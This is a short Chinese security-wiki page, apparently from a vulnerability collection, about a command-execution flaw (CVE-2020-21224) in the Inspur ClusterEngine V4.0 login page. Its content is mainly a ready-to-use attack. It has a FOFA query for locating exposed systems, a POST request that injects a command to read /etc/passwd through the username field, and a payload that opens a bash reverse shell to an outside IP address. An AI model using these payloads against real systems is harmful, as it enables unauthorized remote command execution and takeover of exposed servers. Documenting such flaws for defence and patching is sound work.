menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right --Vulnerability-main chevron_right 浪潮 ClusterEngineV4.0 集群管理系统 命令执行漏洞 (CVE-2020-21224).md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    浪潮 ClusterEngineV4.0 集群管理系统 命令执行漏洞 (CVE-2020-21224).md
    496 B / 2021-05-21 09:14:38
        # 浪潮 ClusterEngineV4.0 集群管理系统 命令执行漏洞 (CVE-2020-21224)
    
    FOFA:
    
    title="TSCEV4.0"
    
    登录处username存在RCE 可直接构造恶意参数进行命令执行:
    
    ```
    POST /login.php
    
    op=login&username=;`cat /etc/passwd`&password="
    shell op=login&username=1 2\',\'1\'\);  `bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.16.11.81%2F80%200%3E%261`
    ```
    
    ref:
    
    * https://cxsecurity.com/cveshow/CVE-2020-21224/
    * https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul
    
    links
    file_download